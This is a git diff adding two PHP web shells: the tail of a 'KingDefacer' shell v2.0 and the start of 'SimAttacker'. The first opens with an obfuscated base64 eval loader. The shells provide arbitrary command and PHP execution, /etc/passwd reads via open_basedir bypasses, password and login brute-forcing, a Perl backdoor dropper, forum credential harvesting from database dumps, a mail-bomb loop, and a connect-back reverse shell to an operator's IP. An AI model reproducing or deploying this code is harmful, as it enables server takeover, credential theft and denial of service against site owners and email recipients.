+}$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
+
+function SqlInsert()
+{
+    extract($_SESSION);
+    $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
+    if($conn)
+    {
+        if(!isset($_POST['sql_insert']))
+        {
+            echo "<form action='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&insert=1' method='post'><center>";    
+            $sql_fields=array();
+            $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
+            while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field'];        
+            for($s=0;$s<count($sql_fields);$s++)
+            echo "$sql_fields[$s]:  <input type='text' name='$sql_fields[$s]'></br>";
+            echo "<input type='submit' value='Insert' name='sql_insert'></center></form>";
+        } else {
+            $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
+            while($f=mysql_fetch_assoc($fields)) $sql_fields[]=$f['Field'];    
+            $values=array();
+            $keys=array();
+            $query="INSERT INTO $_GET[db].$_GET[tbl] (";
+            foreach($_POST as $k=>$v)
+            {
+                if(in_array($k,$sql_fields)&&!empty($v))
+                {
+                    $values[]=$v;
+                    $keys[]=$k;
+                }
+            }
+            for($k=0;$k<count($keys);$k++) 
+            {
+                if($k==count($keys)-1) $query.="`$keys[$k]`";
+                else
+                $query.="`$keys[$k]`,";
+            }
+            $query.=") VALUES (";
+            for($v=0;$v<count($values);$v++)
+            {
+                if($v==count($values)-1) $query.="'$values[$v]'";
+                else
+                $query.="'$values[$v]',";
+            }
+            $query.=")";
+            echo "<center>";
+            if(@mysql_query($query)) echo "Row inserted</br>";
+            else echo "Failed to insert row</br>";
+            echo "</center>";
+        }
+    }
+}
+function SQLDrop()
+{
+    echo "<center>";
+    extract($_SESSION);
+    $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
+    if($conn)
+    {
+        if(!isset($_GET['droptbl']))
+        {
+            $query="DROP DATABASE $_GET[dropdb]";
+            if(@mysql_query($query)) echo "Database $_GET[dropdb] has been dropped<br>";
+            else echo "Failed to drop database $_GET[dropdb]<br>";
+        } elseif(isset($_GET['db'])&&isset($_GET['droptbl']))
+        {
+            $query="DELETE FROM $_GET[db].$_GET[droptbl]";
+            if(@mysql_query($query)) echo "Table $_GET[droptbl] has been dropped<br>";
+            else echo "Failed to drop table $_GET[droptbl]<br>";
+        } else {
+            echo "Invalid request<br>";
+        }
+    } else echo "Failed to connect<br>";
+    echo "</center>";
+}
+function db_create()
+{
+    echo "<center>";
+    if(isset($_POST['db_name']) && !empty($_POST['db_name']))
+    {
+        extract($_SESSION);
+        @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass);
+        if($conn)
+        {
+            if(@mysql_query("CREATE DATABASE $_POST[db_name]")) echo "Status: Database $_POST[db_name] created!";
+            else echo "Failed to create database $_POST[db_name]</br>";
+        } else echo "Failed to connect</br>";
+    } else echo "Enter a DB name</br>";
+    echo "</cenetr>";
+}
+function table_create()
+{
+    echo "<center>";
+    if(isset($_POST['table_name'])&&!empty($_POST['table_name']))
+    {
+        extract($_SESSION);
+        @$conn=mysql_connect($mhost.":".$mport,$muser,$mpass);
+        if($conn)
+        {
+            @mysql_select_db($_POST['db_current']);
+            if(@mysql_query("CREATE TABLE `$_POST[table_name]` (`TEMPORARY` TEXT NOT NULL)")) echo "Status: Table $_POST[table_name] created!";
+            else echo "Failed to create table $_POST[table_name]";
+        } else echo "Failed to connect!</br>";
+    } else echo "Enter a table name</br>";
+    echo "</center>";
+}
+function FileEditor()
+{
+    if(isset($_GET['file']))
+    $file=$_GET['file'];
+    elseif(isset($_POST['nfile']))
+    $file=$_POST['nfile'];
+    elseif(isset($_POST['editfile']))
+    $file=$_POST['editfile'];
+    if(@!file_exists($file)) die("Permission denied!");
+    if(isset($_POST['dfile']))
+    {
+        @$fh=fopen($file,'r');
+        @$buffer=fread($fh,filesize($file));
+        header("Content-type: application/octet-stream");
+           header("Content-length: ".strlen($buffer));
+          header("Content-disposition: attachment; filename=".basename($file).';');
+        @ob_get_clean();
+          echo $buffer;
+        @fclose($fh);
+    }
+    elseif(isset($_POST['delfile']))
+    {
+        if(!unlink(str_replace("//","/",$file))) echo "Failed to delete file!<br>";
+        else echo "File deleted<br>";
+    }
+    elseif(isset($_POST['sfile']))
+    {
+        $fh=@fopen($file,'w') or die("Failed to open file for editing!");
+        @fwrite($fh,stripslashes($_POST['file_contents']),strlen($_POST['file_contents']));
+        echo "File saved!";
+        @fclose($fh);
+    }
+    else
+    {
+        $fh=@fopen($file,'r');
+        echo "<center>
+        <form action='$self?act=f' method='post'>
+        File to edit: <input type='text' style='width: 300px' value='$file' name='nfile'>
+        <input type='submit' value='Go' name='gfile'></br></br>";
+        echo "<textarea rows='20' cols='150' name='file_contents'>".htmlspecialchars(@fread($fh,filesize($file)))."</textarea></br></br>";
+        echo "<input type='submit' value='Save file' name='sfile'>
+        <input type='submit' value='Download file' name='dfile'>
+        <input type='submit' value='Delete file' name='delfile'>
+        </center></form>";
+        @fclose($fh);
+    }
+}
+function security_bypass()
+{
+    if(isset($_POST['curl_bypass']))
+    {
+        $ch=curl_init("file://$_POST[file_bypass]");
+        curl_setopt($ch,CURLOPT_HEADERS,0);
+        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
+        $file_out=curl_exec($ch);
+        curl_close($ch);
+        echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
+    }
+    elseif(isset($_POST['tmp_bypass']))
+    {
+        tempnam("/home/",$_POST['file_passwd']);
+    }
+    elseif(isset($_POST['copy_bypass']))
+    {
+        
+        if(@copy($_POST['file_bypass'],$_POST['dest'])) 
+        {
+            echo "File successfully copied!</br>";
+            @$fh=fopen($_POST['dest'],'r');
+            echo "<textarea rows='20' cols='150' readonly>".htmlspecialchars(@fread($fh,filesize($_POST['dest'])))."</textarea></br></br>";
+            @fclose($fh);
+        } else echo "Failed to copy file</br>";
+    }
+    elseif(isset($_POST['include_bypass']))
+    {
+        if(file_exists($_POST['file_bypass']))
+        {
+            echo "<textarea rows='20' cols='150' readonly>";
+            @include($_POST['file_bypass']);
+            echo "</textarea>";
+        }
+    }
+    elseif(isset($_POST['sql_bypass']))
+    {
+        extract($_SESSION);
+        $conn=mysql_connect($mhost.":".$mport,$muser,$mpass);
+        if($conn)
+        {
+            mysql_select_db($_POST['sql_db']);
+            mysql_query("CREATE TABLE `$_POST[tmp_table]` (`File` TEXT NOT NULL);");
+            mysql_query("LOAD DATA INFILE \"$_POST[sql_file]\" INTO TABLE $_POST[tmp_table]") or die(mysql_error());
+            $res=mysql_query("SELECT * FROM $_POST[tmp_table]");
+            if(mysql_num_rows($res)<1) die("Failed to retrieve file contents!");
+            if($res)
+            {
+                while($row=mysql_fetch_array($res)) $f.="$row[0]</br>";
+                echo $f;
+            }
+        mysql_query("DROP TABLE $_POST[tmp_table]");
+        }
+    }
+    echo "<table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Security (open_basedir) bypassers</td></tr>
+    <tr><td>Bypass using cURL</td><td>Bypass using tempnam()</td></tr>
+    <tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Read file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='curl_bypass' value='Bypass'></form></td><td><form action='$self?act=bypass' method='post' name='bypasser'>Write file: <input type='text' value='../../../etc/passwd' name='file_bypass'><input type='submit' name='tmp_bypass' value='Bypass'></form></td></tr>
+    <tr><td>Bypass using copy()</td><td>Bypass using include()</td></tr>
+    <tr><td><form action='$self?act=bypass' method='post' name='bypasser'>Copy to: <input type='text' style='width: 250px;' name='dest' value='".CleanDir(getcwd())."/copy.php'></br> File to copy: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='copy_bypass' value='Bypass'></form></td><td><form action='$self?act=bypass' method='post' name='bypasser'>Path to file: <input type='text' value='/etc/passwd' name='file_bypass'><input type='submit' name='include_bypass' value='Bypass'></form></td></tr>
+    <tr><td colspan='2'>Bypass using SQL LOAD INFILE [Login to SQL server first]</td></tr>
+    <tr><td colspan='2'><form action='$self?act=bypass' method='post' name='bypasser'>[Existing] Database to store temporary table: <input type='text' value='tmp_database' name='sql_db'></br>Temporary table: <input type='text' value='tmp_file' name='tmp_table'></br><input type='text' value='/etc/passwd' name='sql_file'><input type='submit' name='sql_bypass' value='Bypass'></form></td></tr>
+    </table>";
+}
+function brute_force()
+{
+    echo "<form action='$self' method='post' enctype='multipart/form-data'><input type='hidden' name='docrack'><table style='margin: auto; width: 100%; text-align: center;'><tr><td colspan='2'>Password crackers</td></tr>
+    <tr><td>MD5 Cracker</td><td>SHA1 Cracker</td></tr>
+    <tr><td>Hash: <input type='text' name='md5hash'><input type='submit' value='Crack' name='md5crack'></td><td>Hash: <input type='text' name='sha1hash'><input type='submit' value='Crack' name='sha1crack'></td></tr>
+    <tr><td>VBulletin Salt Cracker</td><td>SMF Salt cracker</td></tr>
+    <tr><td>Hash: <input type='text' name='vbhash'></br>Salt: <input type='text' name='vbsalt' salt='#7A'></br><input type='submit' value='Crack' name='vbcrack'></td><td>Hash: <input type='text' name='smfhash'></br>Salt: <input type='text' name='smfsalt'></br><input type='submit' value='Crack' name='smfcrack'></td></tr>
+    <tr><td>MySQL Brute Force</td><td>FTP Brute Force</td></tr>
+    <tr><td>User: <input type='text' value='root' name='mysql_user'></br>Host: <input type='text' value='localhost' name='mysql_host'></br>Port: <input type='text' value='3306' name='mysql_port'></br><input type='submit' value='Brute' name='mysqlcrack'></td><td>User: <input type='text' value='root' name='ftp_user'></br>Host: <input type='text' value='localhost' name='ftp_host'></br>Port: <input type='text' value='21' name='ftp_port'></br>Timeout: <input type='text' value='5' name='ftp_timeout'></br><input type='submit' value='Brute' name='ftpcrack'></td></tr>
+    <tr><td>Remote login Brute Force</td><td>HTTP-Auth Brute Force</td></tr>
+    <tr><td>Login form: <input type='text' value='' name='remote_login_target'></br>Username: <input type='text' value='admin' name='remote_login_user'><input type='submit' value='Brute' name='remote_login'></td><td>Username: <input type='text' name='auth_user' value='porn_user101'></br>Auth URL: <input type='text' name='auth_url'><input type='submit' value='Brute' name='authcrack'></td></tr>
+    <tr><td colspan='2'>Wordlist</td></tr>
+    <tr><td colspan='2'><input type='file' name='wordlist'></br></br><b>Notice: Be sure to check the max POST length allowed</b></td></tr>
+    </br></table></form>";
+}
+function BackDoor()
+{
+    global $backdoor_perl;
+    global $disable;
+    if(!isset($_POST['backdoor_host']))
+    {
+        echo "<center><form action='$self?act=bh' method='post'>
+        Port: <input type='text' name='port'>
+        <input type='submit' name='backdoor_host' value='Backdoor'></center>";
+    } else {
+        @$fh=fopen("shbd.pl","w");
+        @fwrite($fh,base64_decode($backdoor_perl));
+        @fclose($fh);
+        execmd("perl shbd.pl $_POST[port]",$disable);
+        echo "Server backdoor'd</br>";
+    }
+}
+function sql_rep_search($dir)
+{
+    global $self;
+    $ext=array(".db",".sql");
+    @$dh=opendir($dir);
+    while((@$file=readdir($dh)))
+    {
+        $ex=strrchr($file,'.');
+        if(in_array($ex,$ext)&&$file!="Thumbs.db"&&$file!="thumbs.db")
+        echo "<tr><td><center><a href='$self?act=f&file=$dir"."$file'>$dir"."$file</center></td></tr>";
+        if(is_dir($dir.$file)&&$file!='..'&&$file!='.')
+        {
+            if(!preg_match("/\/public_html\//",$dir))
+            sql_rep_search($dir.$file.'/public_html/');
+            else 
+            sql_rep_search($dir.$file);
+        }
+    }
+    @closedir($dh);
+}
+function database_tools()
+{
+    if(isset($_POST['sql_start_search'])) 
+    {
+        echo "<center><table style='width: auto;'><tr><td><center><font color='#FF0000'>Databases</font></center></td></tr>";
+        sql_rep_search("/home/");
+        echo "</table></center>";
+    }
+    $colarr=array();
+    if(isset($_POST['db_parse']))
+    {
+        if(!is_file($_FILES['db_upath']['tmp_name'])&&empty($_POST['db_dpath'])) die("Please specify a DB to parse...");
+        $db_meth=empty($_POST['db_dpath'])?'uploaded':'path';
+        $q_delimit=$_POST['q_delimit'];
+        if(isset($_POST['column_defined']))
+        {
+            switch($_POST['column_type'])
+            {
+                case 'SMF':
+                break;
+                case 'phpbb':
+                break;
+                case 'vbulletin':
+                $colarr=array(4,5,7,48);
+                break;
+            }
+        } else {
+            $strr=str_replace(", ",",",trim($_POST['db_columns']));
+            $colarr=explode(",",$strr);
+        }
+        switch($db_meth)
+        {
+            case 'uploaded':
+            @$fh=fopen($_FILES['db_upath']['tmp_name'],'r') or die("Failed to open file for reading");
+            break;
+            case 'path':
+            @$fh=fopen($_POST['db_dpath'],'r') or die("Failed to open file for reading");
+            break;
+        }
+            echo "Parsing database contents...</br>";
+            while(!feof($fh))
+            {
+                $c_line=fgets($fh);
+                $strr=str_replace(", ",",",$c_line);
+                $arr=explode(',',$strr);
+                for($i=0;$i<count($colarr);$i++)
+                {
+                    $index=$colarr[$i];
+                    if(empty($arr[$index])) continue;
+                    $spos=strpos("$_POST[q_delimit]",$arr[$index]);
+                    $spos=strpos("$_POST[q_delimit]",$arr[$index],$spos);
+                    if($i!==count($colarr)-1)
+                    echo "$arr[$index] : ";
+                    else echo "$arr[$index]</br>";
+                }
+                continue;
+             } 
+             @fclose($fh);
+    }
+    echo "<table style='width: 100%; margin: auto; text-align: center'>
+    <tr><td colspan='2'>Database parser</td></tr>
+    <tr><td>
+    <form action='$self?act=dbs' method='post' enctype='multipart/form-data'>
+    Quote delimiter (usually ` or '): <input type='text' style='width: 20px' name='q_delimit' value='`'> Columns to retrieve (separate by commas): <input type='text' style='width: 200px' name='db_columns' value='3,5,10'></br>
+    Use predefined column match (user+pass+salt): <input type='checkbox' name='column_defined'> <select name='column_type'>
+    <option value='vbulletin'>VBulletin</option><option value='SMF'>SMF</option><option value='phpbb'>PHPBB</option>
+    </select></br>
+    Path to DB dump: <input type='text' style='width: 300px' value='/home/someuser/public_html/backup.db' name='db_dpath'>
+    </br>Upload DB dump: <input type='file' style='width: 300px' value='' name='db_upath'>
+    </br></br><input type='submit' style='width: 300px' value='Parse Database' name='db_parse'></td></tr>
+    <tr><td colspan='2'>Find database Backups</td></tr>
+    <tr><td>Only search within local path: <input type='checkbox' name='sql_search_local'> <input type='submit' value='Go' name='sql_start_search'></br></td></tr>
+    </table>";
+}
+function show_tools()
+{
+    echo "<form action='$self' method='post'>
+    <table style='width: 100%; margin: auto; text-align: center'>
+    <tr><td colspan='2'>Tools</td></tr>
+    <tr><td>Forum locator</td><td>Config locator</td></tr>
+    <tr><td><form action='$self' method='post'>Passwd file: <input type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name='find_forums'></form></td><td><form action='$self' method='post'>Passwd file: <input type='text' value='/etc/passwd' name='passwd'><input type='submit' value='Find forums' name='find_configs'></form></td></tr>
+    <tr><td>Port scanner</td><td>Search</td></tr>
+    <tr><td><form action='$self' method='post'>Host: Start port: <input type='text' value='localhost' name='host'></br>Start port: <input type='text' value='80' style='width: 50px' name='sport'> End Port: <input type'text' style='width: 50px' value='1000' name='eport'></br><input type='submit' value='Scan' name='port_scan'>Using: <select name='type'><option value='php'>PHP</option><option value='perl'>Perl</option></select></form></td><td>Finish this next</td></tr>
+    </table>";
+}
+function TrueSize($s)
+{
+    if(!$s) return 0;
+    if($s>=1073741824) return(round($s/1073741824)." GB");
+    elseif($s>=1048576) return(round($s/1048576)." MB");
+    elseif($s>=1024) return(round($s/1024)." KB");
+    else return($s." B");
+}
+function CleanDir($d)
+{
+    $d=str_replace("\\","/",$d);
+    $d=str_replace("//","/",$d);
+    return $d;
+}
+function Trail($d)
+{
+    $d=explode('/',$d);
+    array_pop($d);
+    array_pop($d);
+    $str=implode($d,'/');
+    return $str;
+}
+function Encoder()
+{
+    echo "<form action='$self?' method='post'>
+    <center>
+    Input: <input type='text' style='width: 300px' name='encrypt'>
+    <br><input type='submit' value='Encrypt' name='encryption'>
+    </center>
+    </form>";
+}
+$relpath=(isset($_GET['d']))?CleanDir($_GET['d']):CleanDir(realpath(getcwd()));
+if(isset($_GET['d'])) $self.="?d=$_GET[d]";
+echo "<table style='text-align: center; width: 100%'>
+<tr><td colspan='2'>Execute command</td></tr>
+<tr><td colspan='2'><form action='$self?' method='post'><input type='text' style='width: 600px' value='whoami' name='cmd'><input type='submit' name='execmd' value='Execute'></form></td></tr>
+<tr><td colspan='2'>Execute PHP</td></tr>
+<tr><td colspan='2'><form action='$self' method='post'><textarea rows='2' cols='80' name='phpcode' style='background-color: black;'>//Don't include PHP tags</textarea><input type='submit' name='execphp' value='Execute'></form></td></tr>
+<tr><td>Create directory</td><td>Create file</td></tr>
+<tr><td><form action='$self' method='post'><input type='text' style='width: 250px' value='$relpath/sikreet/' name='newdir'><input type='submit' value='Create' name='cnewdir'></form></td><td><form action='$self' method='post'><input type='text' style='width: 250px' value='$relpath/index2.php' name='newfile'><input type='submit' value='Create' name='cnewfile'></form></td></tr>
+<tr><td>Enter directory</td><td>Edit file</td></tr>
+<tr><td><form action='$self' method='post'><input type='text' style='width: 225px' name='godir'><input type='submit' value='Go' name='enterdir'></form></td><td><form action='$self' method='post'><input type='text' style='width: 255px' value='/etc/passwd' name='editfile'><input type='submit' name='doeditfile' value='Go'></form></td></tr>
+<tr><td>Upload file</td><td>Wget file</td></tr>
+<tr><td><form action='$self' method='post' enctype='multipart/form-data'>Save location: <input type='text' style='width: 300px' value='$relpath' name='u_location'></br><input type='file' name='u_file'><input type='submit' value='Upload' name='doUpload'></form></td><td><form action='$self' method='post'><input type='text' style='width: 255px' value='http://www.site.com/image1.jpg' name='wgetfile'><input type='submit' name='dogetfile' value='Go'></form</td></tr>
+<tr><td colspan='2'>Switch theme: <a href='$self?theme=green'>Matrix Green</a>, <a href='$self?theme=uplink'>Uplink Blue</a>, <a href='$self?theme=dark'>Dark</a></td></tr>
+</table>
+</br></br><div id='bar'><center>Shell [version 2.0] Edited By <font color='red'><b>[KingDefacer]</font> | Page generated in : <font color='red'>".round(microtime()-$start,2)." seconds</font></center></div></body></html>";
+ob_end_flush();
+?>
diff --git a/php/simattacker.php b/php/simattacker.php
new file mode 100644
index 0000000..dc3a9d8
--- /dev/null
+++ b/php/simattacker.php
@@ -0,0 +1,754 @@
+<?
+
+//download Files  Code
+
+$fdownload=$_GET['fdownload'];
+
+if ($fdownload <> "" ){
+
+// path & file name
+
+$path_parts = pathinfo("$fdownload");
+
+$entrypath=$path_parts["basename"];
+
+$name = "$fdownload";
+
+$fp = fopen($name, 'rb');
+
+header("Content-Disposition: attachment; filename=$entrypath");
+
+header("Content-Length: " . filesize($name));
+
+fpassthru($fp);
+
+exit;
+
+}
+
+?>
+
+	
+
+<html>
+
+
+
+<head>
+
+<meta http-equiv="Content-Language" content="en-us">
+
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
+
+<title>SimAttacker - Version : 1.0.0 - Edited By KingDefacer</title>
+<style>
+
+<!--
+
+body         { font-family: Tahoma; font-size: 8pt }
+
+-->
+
+</style>
+
+</head>
+
+<body>
+
+<?
+
+error_reporting(E_ERROR | E_WARNING | E_PARSE);
+
+
+
+ //File Edit
+
+ $fedit=$_GET['fedit'];
+
+ if ($fedit <> "" ){
+
+ $fedit=realpath($fedit);
+
+ $lines = file($fedit);
+
+ echo "<form action='' method='POST'>";
+
+echo "<textarea name='savefile' rows=30 cols=80>" ;
+
+foreach ($lines as $line_num => $line) {
+
+ echo htmlspecialchars($line);
+
+}
+
+echo "</textarea>
+
+	<input type='text' name='filepath'  size='60' value='$fedit'>
+
+	<input type='submit' value='save'></form>";
+
+	$savefile=$_POST['savefile'];
+
+	$filepath=realpath($_POST['filepath']);
+
+	if ($savefile <> "") 
+
+	{
+
+	$fp=fopen("$filepath","w+");
+
+	fwrite ($fp,"") ;
+
+	fwrite ($fp,$savefile) ;
+
+	fclose($fp);
+
+	echo "<script language='javascript'> close()</script>";
+
+	}
+
+exit();
+
+ }
+
+?>
+
+<?
+
+// CHmod - PRimission
+
+$fchmod=$_GET['fchmod'];
+
+if ($fchmod <> "" ){
+
+$fchmod=realpath($fchmod);
+
+echo "<center><br>
+
+chmod for :$fchmod<br>
+
+<form method='POST' action=''><br>
+
+Chmod :<br>
+
+<input type='text' name='chmod0' ><br>
+
+<input type='submit' value='change chmod'>
+
+</form>";
+
+$chmod0=$_POST['chmod0'];
+
+if ($chmod0 <> ""){
+
+chmod ($fchmod , $chmod0);
+
+}else {
+
+echo "primission Not Allow change Chmod";
+
+}
+
+exit();
+
+}
+
+?>
+
+	
+
+<div align="center">
+
+	<table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
+
+		<tr>
+
+			<td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
+
+				<p align="center"><b>
+
+				<font face="Tahoma" size="2"><br>
+
+				</font>
+
+				<font color="#D2D200" face="Tahoma" size="2">
+
+				<span style="text-decoration: none">
+
+				<font color="#000000">
+
+				<a href="?id=fm&dir=<?
+
+	echo getcwd();
+
+	?>
+
+	">
+
+				<span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
+
+				<p align="center"><b><a href="?id=cmd">
+
+				<span style="text-decoration: none">
+
+				<font face="Tahoma" size="2" color="#000000">
+
+				CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
+
+				<p align="center"><b><a href="?id=fake-mail">
+
+				<font face="Tahoma" size="2" color="#000000">
+
+				<span style="text-decoration: none">Fake mail</span></font></a></b></p>
+
+				<p align="center"><b>
+
+				<font face="Tahoma" size="2" color="#000000">
+
+				<a href="?id=cshell">
+
+				<span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
+
+				<p align="center"><b>
+
+				<font color="#000000" face="Tahoma" size="2">
+
+				<a href="?id=">
+
+				<span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
+
+				<p>&nbsp;<p align="center">&nbsp;</td>
+
+			<td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
+
+			<?
+
+			//*******************************************************
+
+			//Start Programs About US
+
+			$id=$_GET['id'];
+
+
+
+			if ($id=="") {
+
+			echo "
+
+			<font face='Arial Black' color='#808080' size='1'>
+
+***************************************************************************<br>
+
+&nbsp;Turkish Hackers : WWW.ALTURKS.COM <br>
+
+&nbsp;Programer : SimAttacker - Edited By KingDefacer<br>
+
+&nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group  <br>
+
+&nbsp;please : If you find bug or problems in program , tell me by : <br>
+
+&nbsp;e-mail : kingdefacer@msn.com<br>
+
+Red Eye :) [Only 4 Best Friends ] <br>
+
+***************************************************************************</font></span></p>
+
+";
+
+
+
+echo "<font color='#333333' size='2'>OS :". php_uname();
+
+echo "<br>IP :". 
+
+($_SERVER['REMOTE_ADDR']);
+
+echo "</font>";
+
+
+
+
+
+			}
+
+			//************************************************************
+
+			//cmd-command line
+
+			$cmd=$_POST['cmd'];
+
+			if($id=="cmd"){
+
+		$result=shell_exec("$cmd");
+
+		echo "<br><center><h3> CMD ExeCute </h3></center>" ;
+
+		echo "<center>
+
+		<textarea rows=20 cols=70 >$result</textarea><br>
+
+		<form method='POST' action=''>
+
+		<input type='hidden' name='id' value='cmd'>
+
+		<input type='text' size='80' name='cmd' value='$cmd'>
+
+		<input type='submit' value='cmd'><br>";
+
+			
+
+			
+
+			
+
+			}
+
+			
+
+		//********************************************************	
+
+		
+
+		//fake mail = Use victim server 4 DOS - fake mail 
+
+		if ( $id=="fake-mail"){
+
+		error_reporting(0);
+
+		echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
+
+		echo "<center><form method='post' action=''>
+
+		Victim Mail :<br><input type='text' name='to' ><br>
+
+		Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
+
+		Comments:
+
+		<br>
+
+		<textarea rows='10' cols=50 name='Comments' ></textarea><br>
+
+		<input type='submit' value='Send Mail Strm ' >
+
+		</form></center>";
+
+		//send Storm Mail
+
+		$to=$_POST['to'];
+
+		$nom=$_POST['nom'];
+
+		$Comments=$_POST['Comments'];
+
+		if ($to <> "" ){
+
+		for ($i = 0; $i < $nom ; $i++){
+
+		$from = rand (71,1020000000)."@"."Attacker.com";
+
+		$subject= md5("$from");
+
+        mail($to,$subject,$Comments,"From:$from");
+
+        echo "$i is ok";
+
+        }      
+
+        echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
+
+        }
+
+		}
+
+		//********************************************************
+
+
+
+			//Connect Back -Firewall Bypass
+
+			if ($id=="cshell"){
+
+			echo "<br>Connect back Shell , bypass Firewalls<br>
+
+			For user :<br>
+
+			nc -l -p 1019 <br>
+
+			<hr>
+
+			<form method='POST' action=''><br>
+
+			Your IP & BindPort:<br>
+
+			<input type='text' name='mip' >
+
+			<input type='text' name='bport' size='5' value='1019'><br>
+
+			<input type='submit' value='Connect Back'>
+
+			</form>";
+
+		 $mip=$_POST['mip'];
+
+		 $bport=$_POST['bport'];
+
+		 if ($mip <> "")
+
+		 {
+
+		 $fp=fsockopen($mip , $bport , $errno, $errstr);
+
+		 if (!$fp){
+
+		       $result = "Error: could not open socket connection";
+
+		 }
+
+		 else {
+
+		 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n"); 
+
+	  while(!feof($fp)){ 
+
+       fputs ($fp," bash # ");
+
+       $result= fgets ($fp, 4096);
+
+      $message=`$result`;
+
+       fputs ($fp,"--> ".$message."\n");
+
+      }
+
+      fclose ($fp);
+
+		 }
+
+		 }
+
+			}
+
+			
+
+		//********************************************************
+
+			//Spy File Manager
+
+			$homedir=getcwd();
+
+			$dir=realpath($_GET['dir'])."/";
+
+			if ($id=="fm"){
+
+			echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir 
+
+                  &nbsp;<b>
+
+                  <form action='' method='GET'>
+
+                  &nbsp;Path:</b>
+
+                  <input type='hidden' name='id' value='fm'>
+
+                  <input type='text' name='dir' size='80' value='$dir'>
+
+                  <input type='submit' value='dir'>
+
+                  </form>
+
+                 <br>";
+
+
+
+			echo "
+
+
+
+<div align='center'>
+
+
+
+<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
+
+	<tr>
+
+		<td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
+
+		<td height='28' width='82' align='center'>
+
+		<font color='#000080' size='2'><b>Size KByte</b></font></td>
+
+		<td height='28' width='83' align='center'>
+
+		<font color='#008000' size='2'><b>Download</b></font></td>
+
+		<td height='28' width='66' align='center'>
+
+		<font color='#FF9933' size='2'><b>Edit</b></font></td>
+
+		<td height='28' width='75' align='center'>
+
+		<font color='#999999' size='2'><b>Chmod</b></font></td>
+
+		<td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
+
+	</tr>";
+
+		    if (is_dir($dir)){
+
+		    if ($dh=opendir($dir)){
+
+		    while (($file = readdir($dh)) !== false) {
+
+		    $fsize=round(filesize($dir . $file)/1024);
+
+		
+
+		    
+
+	echo " 
+
+	<tr>
+
+		<th width='250' height='22' align='left' nowrap>";
+
+		if (is_dir($dir.$file))
+
+		{
+
